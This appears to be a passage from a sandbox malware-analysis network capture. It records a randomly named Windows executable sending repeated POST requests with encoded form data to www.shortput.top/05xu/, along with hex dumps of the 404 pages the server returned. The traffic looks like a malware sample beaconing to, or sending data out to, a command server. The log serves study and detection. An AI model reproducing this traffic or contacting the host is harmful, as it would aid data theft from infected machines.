                                May 28, 2024 07:17:14.853519917 CEST1236INData Raw: 32 2e 38 34 34 30 36 2c 2d 31 31 2e 32 34 39 39 32 20 31 35 2e 34 37 30 36 37 2c 2d 31 39 2e 34 36 36 37 35 20 2d 36 2e 37 39 39 33 34 2c 34 2e 30 33 32 39 35 20 2d 31 34 2e 33 32 39 33 2c 36 2e 39 36 30 35 35 20 2d 32 32 2e 33 34 34 36 31 2c 38
                                Data Ascii: 2.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.2434
                                May 28, 2024 07:17:14.853533030 CEST1236INData Raw: 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 32 34 20 36 34 30 71 30 20 31 30 36 20 2d 37 35 20 31 38 31 74 2d 31 38 31 20 37 35 74 2d 31 38 31 20 2d 37 35 74 2d 37 35 20 2d 31 38 31 74 37 35 20 2d 31 38 31 74 31 38 31 20 2d 37 35 74 31 38 31 20 37
                                Data Ascii: "><path d="M1024 640q0 106 -75 181t-181 75t-181 -75t-75 -181t75 -181t181 -75t181 75t75 181zM1162 640q0 -164 -115 -279t-279 -115t-279 115t-115 279t115 279t279 115t279 -115t115 -279zM1270 1050q0 -38 -27 -65t-65 -27t-65 27t-27 65t27 65t65 27t65 -
                                May 28, 2024 07:17:14.853544950 CEST457INData Raw: 0a 3c 2f 75 6c 3e 0a 3c 2f 6e 61 76 3e 0a 3c 2f 66 6f 6f 74 65 72 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 2c 6f 2c 67 2c 72 2c 61 2c 6d 29 7b 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65
                                Data Ascii: </ul></nav></footer><script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                29192.168.2.649741203.161.43.227801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:17:20.398274899 CEST737OUTPOST /05xu/ HTTP/1.1
                                Host: www.shortput.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.shortput.top
                                Referer: http://www.shortput.top/05xu/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 63 63 78 74 42 4c 6e 46 6a 6d 4a 65 4b 4f 47 61 59 64 77 52 67 34 31 42 4a 7a 6d 73 42 58 6c 54 4b 52 44 73 65 32 69 70 56 46 68 6d 41 72 43 61 47 72 42 76 59 69 66 57 48 65 4f 59 79 38 73 39 4a 4d 4a 34 69 6e 7a 38 73 5a 58 77 63 74 4d 6f 45 47 36 42 31 31 6f 4a 67 54 33 42 49 67 61 76 4c 31 6a 5a 35 75 6d 30 69 75 55 42 67 34 64 6d 30 31 4e 68 78 37 38 38 63 53 31 38 6d 79 78 49 4b 34 4f 67 39 68 6b 4b 2b 41 35 6c 73 4b 70 4c 49 6d 4c 4a 49 2f 53 33 70 43 48 6c 41 70 52 42 67 67 46 75 47 73 64 42 6e 33 48 42 66 61 74 6b 78 77 34 77 58 6f 6e 73 42 4c 33 61 6c 6f 41 36 46 2b 45 45 79 62 37 5a 59 6b 75 6c
                                Data Ascii: jTZPp=ccxtBLnFjmJeKOGaYdwRg41BJzmsBXlTKRDse2ipVFhmArCaGrBvYifWHeOYy8s9JMJ4inz8sZXwctMoEG6B11oJgT3BIgavL1jZ5um0iuUBg4dm01Nhx788cS18myxIK4Og9hkK+A5lsKpLImLJI/S3pCHlApRBggFuGsdBn3HBfatkxw4wXonsBL3aloA6F+EEyb7ZYkul
                                May 28, 2024 07:17:20.999479055 CEST1236INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:17:20 GMT
                                Server: Apache
                                Content-Length: 38381
                                Connection: close
                                Content-Type: text/html
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
                                May 28, 2024 07:17:20.999500990 CEST224INData Raw: 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73
                                Data Ascii: 7.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.
                                May 28, 2024 07:17:20.999511957 CEST1236INData Raw: 36 20 32 39 39 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 36 35 2e 32 22 20 63 79 3d 22 38 35
                                Data Ascii: 6 299.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="465.2" cy="859" r="3.7" transform="translate(-340.4 306.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="483" cy="849.2" r="3.7" transform="translate(-333.9 313
                                May 28, 2024 07:17:20.999522924 CEST1236INData Raw: 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 38 39 2e 38 22 20 63 79 3d 22 37 39 31 2e 31 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33
                                Data Ascii: #ffe029"/> <circle cx="489.8" cy="791.1" r="3.7" transform="translate(-306.7 310.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="473.1" cy="798.2" r="3.7" transform="translate(-311.8 303.4) rotate(-27.1)" style="fill:
                                May 28, 2024 07:17:20.999535084 CEST1236INData Raw: 22 20 63 79 3d 22 38 31 32 2e 39 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 31 33 2e 34 20 33 32 36 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c
                                Data Ascii: " cy="812.9" r="3.7" transform="translate(-313.4 326.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="534.7" cy="822.9" r="3.7" transform="translate(-316.3 334.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="536.8"
                                May 28, 2024 07:17:20.999547005 CEST1236INData Raw: 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 39 37 2e 33 20 33 34 37 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20
                                Data Ascii: ="translate(-297.3 347.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="589.7" cy="797.2" r="3.7" transform="translate(-298.5 356.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="590" cy="782.3" r="3.7" transform="t
                                May 28, 2024 07:17:20.999558926 CEST896INData Raw: 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 34 38 22 20 63 79 3d 22 37 34 37 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d
                                Data Ascii: )" style="fill: #ffe029"/> <circle cx="648" cy="747.5" r="3.7" transform="translate(-269.4 377.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="643.5" cy="727.1" r="3.7" transform="translate(-260.6 373.2) rotate(-27.1)"
                                May 28, 2024 07:17:20.999572039 CEST1236INData Raw: 22 20 63 79 3d 22 37 34 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 33 2e 31 20 33 36 32 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c
                                Data Ascii: " cy="747.7" r="3.7" transform="translate(-273.1 362.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="602.2" cy="735.1" r="3.7" transform="translate(-268.8 355.3) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="583.1"
                                May 28, 2024 07:17:20.999586105 CEST224INData Raw: 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 36 35 2e 37 20 33 34 37 2e 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20
                                Data Ascii: ="translate(-265.7 347.3) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="590.7" cy="708.2" r="3.7" transform="translate(-257.8 347) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="591.4" cy="691.3" r
                                May 28, 2024 07:17:20.999596119 CEST1236INData Raw: 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 30 2e 31 20 33 34 35 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09
                                Data Ascii: ="3.7" transform="translate(-250.1 345.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.1" cy="698.1" r="3.7" transform="translate(-255.1 338.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.8" cy="681.2" r=
                                May 28, 2024 07:17:21.005021095 CEST1236INData Raw: 65 28 2d 32 37 32 20 33 32 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 33 37 2e 35 22 20 63 79 3d
                                Data Ascii: e(-272 323) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="537.5" cy="709.2" r="3.7" transform="translate(-264.1 322.9) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="541.1" cy="692.9" r="3.7" transform="translate(-25


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                30192.168.2.649742203.161.43.227801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:17:22.933852911 CEST761OUTPOST /05xu/ HTTP/1.1
                                Host: www.shortput.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.shortput.top
                                Referer: http://www.shortput.top/05xu/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 63 63 78 74 42 4c 6e 46 6a 6d 4a 65 4c 75 57 61 65 4f 49 52 33 49 31 43 46 54 6d 73 55 48 6c 58 4b 52 50 73 65 30 4f 35 41 67 4a 6d 41 4b 79 61 48 75 31 76 4c 53 66 57 50 2b 4f 64 39 63 73 32 4a 4d 46 61 69 6c 33 38 73 5a 44 77 63 74 38 6f 45 30 53 43 30 6c 6f 4c 6f 7a 33 44 43 41 61 76 4c 31 6a 5a 35 75 61 4f 69 75 4d 42 67 73 5a 6d 79 55 4e 67 33 4c 38 7a 56 79 31 38 69 79 78 4d 4b 34 50 31 39 6a 41 73 2b 46 39 6c 73 4f 74 4c 49 79 58 57 43 2f 53 78 6b 69 48 37 4e 62 39 4b 74 32 4d 76 49 4e 4e 53 32 57 36 67 65 73 73 2b 74 44 34 54 46 34 48 75 42 4a 76 6f 6c 49 41 51 48 2b 38 45 67 4d 33 2b 58 51 4c 47 49 6b 66 73 46 66 73 7a 59 55 35 30 50 62 46 48 2b 49 36 2f 31 51 3d 3d
                                Data Ascii: jTZPp=ccxtBLnFjmJeLuWaeOIR3I1CFTmsUHlXKRPse0O5AgJmAKyaHu1vLSfWP+Od9cs2JMFail38sZDwct8oE0SC0loLoz3DCAavL1jZ5uaOiuMBgsZmyUNg3L8zVy18iyxMK4P19jAs+F9lsOtLIyXWC/SxkiH7Nb9Kt2MvINNS2W6gess+tD4TF4HuBJvolIAQH+8EgM3+XQLGIkfsFfszYU50PbFH+I6/1Q==
                                May 28, 2024 07:17:23.545088053 CEST1236INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:17:23 GMT
                                Server: Apache
                                Content-Length: 38381
                                Connection: close
                                Content-Type: text/html
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <cir [TRUNCATED]
                                May 28, 2024 07:17:23.545104980 CEST1236INData Raw: 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73
                                Data Ascii: 7.1)" style="fill: #ffe029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 299.8) rotate(-27
                                May 28, 2024 07:17:23.545115948 CEST1236INData Raw: 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 37 31 2e 35 22 20 63 79 3d 22 38 31 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 32 30 2e 39 20 33 30 34 2e 38 29 20 72 6f 74 61 74 65
                                Data Ascii: <circle cx="471.5" cy="817.7" r="3.7" transform="translate(-320.9 304.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ffe029"/>
                                May 28, 2024 07:17:23.545149088 CEST1236INData Raw: 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 30 31 2e 37 20 33 31 37 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20
                                Data Ascii: 7" transform="translate(-301.7 317.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="504.6" cy="802.3" r="3.7" transform="translate(-310.2 318.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="519.7" cy="812.9" r="3.7
                                May 28, 2024 07:17:23.545161009 CEST1236INData Raw: 20 33 34 31 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 30 2e 35 22 20 63 79 3d 22 38 30 37
                                Data Ascii: 341.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="570.5" cy="807.2" r="3.7" transform="translate(-305.2 348.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="572.5" cy="790.5" r="3.7" transform="translate(-297.3
                                May 28, 2024 07:17:23.545176029 CEST1236INData Raw: 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 36 38 32 2e 37 22 20 63 79 3d 22 37 34 39 2e 32 22 20 72 3d 22 33 2e 36 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 36
                                Data Ascii: #ffe029"/> <circle cx="682.7" cy="749.2" r="3.6" transform="translate(-266.4 393.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="662.5" cy="737.6" r="3.7" transform="translate(-263.4 383) rotate(-27.1)" style="fill: #ff
                                May 28, 2024 07:17:23.545181990 CEST776INData Raw: 36 30 32 2e 32 22 20 63 79 3d 22 37 33 35 2e 31 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 36 38 2e 38 20 33 35 35 2e 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d
                                Data Ascii: 602.2" cy="735.1" r="3.7" transform="translate(-268.8 355.3) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="583.1" cy="740.9" r="3.7" transform="translate(-273.6 347.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="5
                                May 28, 2024 07:17:23.545187950 CEST1236INData Raw: 35 20 33 33 39 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 36 38 22 20 63 79 3d 22 37 33 30 2e
                                Data Ascii: 5 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="568" cy="730.7" r="3.7" transform="translate(-270.6 339.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="571.9" cy="714.5" r="3.7" transform="translate(-262.8 3
                                May 28, 2024 07:17:23.545198917 CEST224INData Raw: 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 34 32 2e 35 22 20 63 79 3d 22 36 35 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c
                                Data Ascii: "fill: #ffe029"/> <circle cx="542.5" cy="658.8" r="3.7" transform="translate(-240.6 319.6) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="526.3" cy="682.4" r="3.7" transform="translate(-253.2 314.8) rot
                                May 28, 2024 07:17:23.545208931 CEST1236INData Raw: 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 32 32 2e 32 22 20 63 79 3d 22 36 39 37 2e 33 22 20 72 3d 22 33 2e 37 22
                                Data Ascii: ate(-27.1)" style="fill: #ffe029"/> <circle cx="522.2" cy="697.3" r="3.7" transform="translate(-260.4 314.6) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="518.7" cy="713.5" r="3.7" transform="translate(-268.2 314.8) rota
                                May 28, 2024 07:17:23.550082922 CEST1236INData Raw: 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 32 36 2e 37 22 20 63 79 3d 22 37 35 39 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 38 38 2e 33 20 33 32 33 2e 35
                                Data Ascii: > <circle cx="526.7" cy="759.5" r="3.7" transform="translate(-288.3 323.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="524" cy="777" r="3.7" transform="translate(-296.5 324.2) rotate(-27.1)" style="fill: #ffe029"/>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                31192.168.2.649743203.161.43.227801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:17:25.470640898 CEST1774OUTPOST /05xu/ HTTP/1.1
                                Host: www.shortput.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.shortput.top
                                Referer: http://www.shortput.top/05xu/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 63 63 78 74 42 4c 6e 46 6a 6d 4a 65 4c 75 57 61 65 4f 49 52 33 49 31 43 46 54 6d 73 55 48 6c 58 4b 52 50 73 65 30 4f 35 41 6d 52 6d 41 63 47 61 48 4a 5a 76 61 69 66 57 46 65 4f 63 39 63 73 33 4a 50 31 65 69 6c 72 73 73 61 37 77 65 4f 30 6f 43 46 53 43 74 56 6f 4c 6b 54 33 43 49 67 61 66 4c 31 7a 64 35 75 71 4f 69 75 4d 42 67 74 70 6d 79 46 4e 67 73 4c 38 38 63 53 31 67 6d 79 78 6b 4b 34 6e 6c 39 6a 55 61 2b 57 46 6c 73 75 39 4c 4f 42 2f 57 42 66 53 7a 68 69 47 6f 4e 62 77 53 74 33 6b 4a 49 4e 35 34 32 56 6d 67 66 6f 31 35 39 79 67 36 51 62 54 73 65 2b 72 46 6c 64 34 34 4a 63 67 35 7a 4d 48 74 51 7a 66 47 42 79 4c 45 41 35 39 67 50 6e 41 55 50 72 52 54 7a 4b 33 55 75 64 68 73 69 79 33 65 58 63 38 52 68 77 4e 30 49 4c 42 6b 66 6e 52 72 6f 67 6a 52 50 57 79 64 5a 50 36 37 76 6f 48 2f 47 74 48 69 6f 45 42 49 66 70 33 6e 67 30 37 55 54 75 48 79 67 67 45 76 55 4c 6d 53 70 47 41 68 79 56 73 53 4a 6e 59 30 68 4d 4c 39 43 61 6a 4b 64 35 36 30 77 58 50 6a 59 37 63 4c 6d 51 74 30 38 54 74 31 [TRUNCATED]
